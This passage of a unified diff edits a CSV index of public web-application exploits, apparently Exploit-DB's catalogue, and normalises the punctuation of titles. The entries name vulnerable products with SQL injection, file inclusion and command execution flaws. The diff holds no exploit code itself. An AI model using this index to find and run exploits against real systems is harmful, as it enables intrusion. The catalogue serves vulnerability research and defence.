Script - Reset Password / Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete",2010-04-23,"Chip d3 bi0s",php,webapps,0 -12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - (tempid) SQL Injection",2010-04-23,v3n0m,php,webapps,0 +12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - 'tempid' SQL Injection",2010-04-23,v3n0m,php,webapps,0 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,cr4wl3r,php,webapps,0 12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-24,cr4wl3r,php,webapps,0 @@ -23872,7 +23876,7 @@ id,file,description,date,author,platform,type,port 12644,platforms/php/webapps/12644.txt,"WebJaxe - SQL Injection",2010-05-18,IHTeam,php,webapps,0 12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 -12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0 +12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - 'vid' SQL Injection",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,vir0e5,php,webapps,0 12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0 @@ -23943,7 +23947,7 @@ id,file,description,date,author,platform,type,port 12735,platforms/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps,0 -12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 +12743,platforms/php/webapps/12743.txt,"web5000 - 'page_show' SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 @@ -23976,7 +23980,7 @@ id,file,description,date,author,platform,type,port 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12792,platforms/php/webapps/12792.txt,"MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-29,XroGuE,php,webapps,0 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0 -12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0 +12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection",2010-05-29,gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0 12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 @@ -24153,7 +24157,7 @@ id,file,description,date,author,platform,type,port 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard - SQL Injection",2010-08-31,Ariko-Security,php,webapps,0 13944,platforms/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 -13945,platforms/php/webapps/13945.txt,"iBoutique - (page) SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13945,platforms/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13946,platforms/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 @@ -24425,7 +24429,7 @@ id,file,description,date,author,platform,type,port 14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps,0 14426,platforms/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,php,webapps,0 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - Cross-Site Request Forgery",2010-07-21,anonymous,windows,webapps,0 -14432,platforms/php/webapps/14432.txt,"OpenX - (phpAdsNew) Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 +14432,platforms/php/webapps/14432.txt,"OpenX - 'phpAdsNew' Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Arbitrary File Upload",2010-07-21,H-SK33PY,php,webapps,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 @@ -24616,7 +24620,7 @@ id,file,description,date,author,platform,type,port 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0 -14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0 +14985,platforms/php/webapps/14985.txt,"System Shop - 'Module aktka' SQL Injection",2010-09-12,secret,php,webapps,0 14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0 @@ -25228,7 +25232,7 @@ id,file,description,date,author,platform,type,port 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 -16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0 +16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 @@ -25499,7 +25503,7 @@ id,file,description,date,author,platform,type,port 17553,platforms/php/webapps/17553.txt,"Joomla! Component 'com_rsappt_pro2' - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0 -17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0 +17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0 17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 @@ -25785,7 +25789,7 @@ id,file,description,date,author,platform,type,port 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 -18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0 +18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - 'popup.php' SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 @@ -26729,7 +26733,7 @@ id,file,description,date,author,platform,type,port 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0 -22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - Packages.php Remote File Inclusion",2003-01-22,spabam,php,webapps,0 +22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion",2003-01-22,spabam,php,webapps,0 22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution",2003-01-22,MGhz,php,webapps,0 22198,platforms/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 @@ -26764,15 +26768,15 @@ id,file,description,date,author,platform,type,port 22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - 'search.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 - 'comments.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22293,platforms/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,php,webapps,0 -22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - ipchat.php Remote File Inclusion",2003-02-27,frog,php,webapps,0 +22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion",2003-02-27,frog,php,webapps,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",php,webapps,0 -22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - Translations.php Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 +22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 22300,platforms/php/webapps/22300.txt,"WordPress Plugin Easy Webinar - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0 40413,platforms/php/webapps/40413.txt,"Joomla! Component 'com_videogallerylite' 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80 -22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0 +22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,php,webapps,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 @@ -26877,7 +26881,7 @@ id,file,description,date,author,platform,type,port 22590,platforms/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - modules.php 'Username' URI Parameter Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 -22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 +22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0 @@ -26885,7 +26889,7 @@ id,file,description,date,author,platform,type,port 22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps,0 22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps,0 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0 -22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 +22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,php,webapps,0 22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 - member.php Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps,0 @@ -26943,7 +26947,7 @@ id,file,description,date,author,platform,type,port 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 -22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution",2003-06-15,frog,php,webapps,0 +22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - search.asp Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 @@ -27037,7 +27041,7 @@ id,file,description,date,author,platform,type,port 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 -23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 +23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' Parameter SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 @@ -27056,7 +27060,7 @@ id,file,description,date,author,platform,type,port 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps,0 -23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - Multiple Module SQL Injection",2003-09-03,noconflic,php,webapps,0 +23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - (Multiple Modules) SQL Injection",2003-09-03,noconflic,php,webapps,0 23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps,0 23105,platforms/php/webapps/23105.txt,"MyBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0 23106,platforms/php/webapps/23106.txt,"SchoolCMS - Persistent Cross-Site Scripting",2012-12-03,VipVince,php,webapps,0 @@ -27183,7 +27187,7 @@ id,file,description,date,author,platform,type,port 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 -23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 +23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - (Multiple Modules) SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 @@ -27201,7 +27205,7 @@ id,file,description,date,author,platform,type,port 23498,platforms/hardware/webapps/23498.txt,"SonicWALL SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps,0 -23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - 'config_page.php' Remote PHP File Inclusion",2004-01-02,tsbeginnervn,php,webapps,0 +23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion",2004-01-02,tsbeginnervn,php,webapps,0 23513,platforms/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0 23515,platforms/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps,0 @@ -27214,14 +27218,14 @@ id,file,description,date,author,platform,type,port 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 -23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 +23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting",2004-01-16,JeiAr,php,webapps,0 23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - Adminlogin.asp SQL Injection",2004-01-16,posidron,asp,webapps,0 23548,platforms/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter SQL Injection",2004-01-16,JeiAr,cgi,webapps,0 23549,platforms/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps,0 23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0 23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - userchannel.pl op Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0 -23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - mod_mainmenu.php Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0 +23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0 23554,platforms/php/webapps/23554.java,"YABB SE 1.x - SSI.php ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",php,webapps,0 23561,platforms/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 @@ -27235,11 +27239,11 @@ id,file,description,date,author,platform,type,port 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0 23616,platforms/php/webapps/23616.txt,"PHPGedView 2.x - Editconfig_gedcom.php Directory Traversal",2004-01-30,"Cedric Cochin",php,webapps,0 -23617,platforms/php/webapps/23617.txt,"PHPGedView 2.x - [GED_File]_conf.php Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps,0 +23617,platforms/php/webapps/23617.txt,"PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps,0 23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x - browser.php Directory Traversal",2004-01-30,"Himeur Nourredine",php,webapps,0 -23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 -23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 -23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 +23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 +23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 +23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection",2012-12-24,Red_Hat,php,webapps,0 @@ -27264,8 +27268,8 @@ id,file,description,date,author,platform,type,port 23676,platforms/asp/webapps/23676.txt,"Maxwebportal 1.3x - down.asp HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 23677,platforms/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message SendTo Parameter Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 -23683,platforms/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - 